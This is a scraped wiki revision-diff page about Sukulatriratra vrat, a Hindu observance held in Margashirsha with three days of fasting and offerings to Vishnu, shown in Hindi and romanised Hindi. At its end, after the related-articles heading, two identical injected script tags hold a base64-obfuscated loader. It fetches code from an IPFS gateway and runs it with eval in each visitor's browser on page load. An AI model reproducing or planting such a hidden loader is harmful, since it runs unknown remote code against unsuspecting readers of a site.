Difference between revisions of "सुकुलत्रिरात्र व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[मार्गशीर्ष]] [[मास]] में उस तिथि को जो त्र्यम्बक हो, इसे किया जाता है।
 
*[[मार्गशीर्ष]] [[मास]] में उस तिथि को जो त्र्यम्बक हो, इसे किया जाता है।
 
*तीन दिनों तक उपवास करना चाहिए।
 
*तीन दिनों तक उपवास करना चाहिए।
Line 8: Line 8:
 
*धर्मशास्त्र इतिहास 4 में 'त्रिमधुर' एवं 'त्र्यम्बक' में इसका उल्लेख है।  
 
*धर्मशास्त्र इतिहास 4 में 'त्रिमधुर' एवं 'त्र्यम्बक' में इसका उल्लेख है।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:27, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh mas mean us tithi ko jo tryambak ho, ise kiya jata hai.
  • tin dinoan tak upavas karana chahie.
  • shvet, pit evan lal pushpoan, tin lepoan tatha guggul, kutuk evan ral ki dhoop se trivikram (vishnu) ki pooja karani chahie.
  • trimadhur ka arpan karana chahie.
  • tin dip, jau, til evan sarasoan se hom karana chahie.
  • triloh (sona, rajat evan tamr) ka dan karana chahie.[1]
  • dharmashastr itihas 4 mean 'trimadhur' evan 'tryambak' mean isaka ullekh hai.


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 322-323, vishnudharmottarapuran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>